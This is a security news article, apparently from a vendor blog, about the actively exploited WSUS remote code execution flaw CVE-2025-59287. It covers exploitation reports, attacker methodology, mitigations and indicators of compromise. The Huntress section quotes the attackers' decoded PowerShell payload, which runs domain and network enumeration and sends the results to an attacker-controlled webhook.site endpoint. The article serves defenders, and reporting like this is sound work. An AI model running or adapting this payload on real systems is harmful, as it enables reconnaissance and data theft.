Urgent: Microsoft WSUS Remote Code Execution Vulnerability Exploited

CVE-2025-59287 WSUS vulnerability Windows Server Update Services remote code execution cybersecurity patch Tuesday CISA UNC6512
Edward Zhou
Edward Zhou

CEO & Co-Founder

 
October 28, 2025 3 min read

TL;DR

This article details the critical WSUS vulnerability, CVE-2025-59287, which allows remote code execution. It covers active exploitation by threat actors, the technical details of the flaw affecting various Windows Server versions, and specific attack methodologies observed by security researchers. Essential remediation steps, including immediate patching and temporary workarounds like disabling the WSUS role or blocking ports, are provided to help organizations secure their systems.

WSUS Attacks Exploiting CVE-2025-59287

Multiple organizations are affected by attacks exploiting a critical Windows Server Update Services (WSUS) remote code execution vulnerability identified as CVE-2025-59287. Security researchers and threat intelligence teams are actively monitoring the exploitation of this flaw. Microsoft released an emergency patch and CISA added the bug to its Known Exploited Vulnerabilities catalog.

Microsoft has not yet updated its advisory to acknowledge the active exploitation. Google Threat Intelligence Group (GTIG) stated they are actively investigating exploitation of CVE-2025-59287 by a newly identified threat actor, UNC6512, across multiple victim organizations. GTIG observed the actor conducting reconnaissance and data exfiltration from compromised hosts.

Technical Details of CVE-2025-59287

CVE-2025-59287 affects Windows Server versions 2012 through 2025. It stems from insecure deserialization of untrusted data, allowing unauthenticated attackers to execute arbitrary code on vulnerable systems. Servers without the WSUS role enabled are not affected. Initial fixes for CVE-2025-59287 were issued on October's Patch Tuesday, but these did not fully address the vulnerability, necessitating an emergency update.

Trend Micro's Zero Day Initiative reported approximately 100,000 hits exploiting this bug within seven days. They estimate nearly 500,000 internet-facing servers have the WSUS service enabled. Palo Alto Networks' Unit 42 team observed limited impacted customers. Unit 42's analysis indicates attackers are focused on gaining initial access and performing internal network reconnaissance.

Attack Methodology and Observations

Unit 42 observed the following methodology in attacks exploiting CVE-2025-59287:

  • Initial Access: Attackers target publicly exposed WSUS instances on default TCP ports, 8530 (HTTP) and 8531 (HTTPS).
  • Execution: Malicious PowerShell commands are executed via specific parent processes like wsusservice.exe and w3wp.exe. Huntress observed similar process chains:
    • wsusservice.exe → cmd.exe → cmd.exe → powershell.exe
    • w3wp.exe → cmd.exe → cmd.exe → powershell.exe
  • Reconnaissance: Initial payloads gather intelligence on the internal network environment, including commands like whoami, net user /domain, and ipconfig /all.
  • Data Exfiltration: Collected information is exfiltrated to a remote, attacker-controlled Webhook.site endpoint using a PowerShell payload or curl.exe.

Cortex Xpanse identified approximately 5,500 WSUS instances exposed to the internet. Huntress Labs observed threat actors exploiting the WSUS vulnerability across multiple customers, starting around 2025-10-23 23:34 UTC.

Remediation and Mitigation

Microsoft has recommended temporary workarounds for organizations unable to immediately deploy the emergency patches. As of Oct. 27, the guidance consisted of the following mitigations:

  1. Disable the WSUS Server Role: Disabling the WSUS role removes the attack vector, but prevents the server from distributing updates.
  2. Block High-Risk Ports: Block all inbound traffic to TCP ports 8530 and 8531 on the host-level firewall.

CISA urges organizations to implement Microsoft's updated guidance for the WSUS Remote Code Execution Vulnerability.

Huntress Labs Observations

Figure 1: wsusservice.exe → cmd.exe → cmd.exe → powershell.exe

Image courtesy of Huntress Labs

Huntress Labs observed attackers leveraging exposed WSUS endpoints to send specially crafted requests that triggered a deserialization RCE against the update service. Exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and WSUS service binary. Proxy networks were used by the attackers to conduct and obfuscate exploitation.

The PowerShell payload (base64 decoded) used by attackers is:

powershell -ec
try{$r= (&{echo https://[REDACTED]:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w="http://webhook.site/[REDACTED]";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w --data-binary $r}

This payload enumerates servers for sensitive network and user information and extracts results to a remote webhook.

Indicators of Compromise (IOCs)

Huntress Labs identified the following IOCs:

  • C:\Program Files\Update Services\Logfiles\SoftwareDistribution.log: WSUS log file to review indicators of compromise.
  • C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log: HTTP service log files to review indicators of compromise.
  • w3wp.exe: HTTP worker process binary.
  • wsusservice.exe: WSUS service process binary.
  • whoami;net user /domain: Observed enumeration command.
  • net user /domain; ipconfig /all: Observed enumeration command.
  • CVE-2025-59287
  • Microsoft
Edward Zhou
Edward Zhou

CEO & Co-Founder

 

CEO & Co-Founder of Gopher Security, leading the development of Post-Quantum cybersecurity technologies and solutions.

Related News

AI-Driven Cybersecurity Innovations: The Future of Threat Prevention
AI agents security

AI-Driven Cybersecurity Innovations: The Future of Threat Prevention

AI agents are prime targets for cyberattacks. Discover evolving threats like prompt injection & AI-powered exploits, and learn how to fortify your defenses. Read now!

By Brandon Woo January 22, 2026 5 min read
common.read_full_article
GootLoader Malware Evades Detection Using Nested ZIP Archives
GootLoader

GootLoader Malware Evades Detection Using Nested ZIP Archives

GootLoader is back with advanced tricks, using malformed ZIPs to bypass security & target businesses. Learn how to detect and defend against this threat. Protect your assets!

By Edward Zhou January 21, 2026 3 min read
common.read_full_article
WhisperPair Vulnerability: Millions of Bluetooth Devices at Risk
WhisperPair attack

WhisperPair Vulnerability: Millions of Bluetooth Devices at Risk

Millions of Bluetooth audio devices are at risk from the WhisperPair vulnerability. Learn how attackers can eavesdrop and track your devices, and what you can do to protect yourself. Update your firmware now!

By Jim Gagnard January 20, 2026 3 min read
common.read_full_article
Tech Hiring Growth: 12-15% Increase in AI and Data Jobs by 2026
India tech job market

Tech Hiring Growth: 12-15% Increase in AI and Data Jobs by 2026

India's tech job market is set for a 12-15% surge in 2026, creating 1.25 lakh roles. Discover key sectors and skills in demand. Read more!

By Edward Zhou January 19, 2026 3 min read
common.read_full_article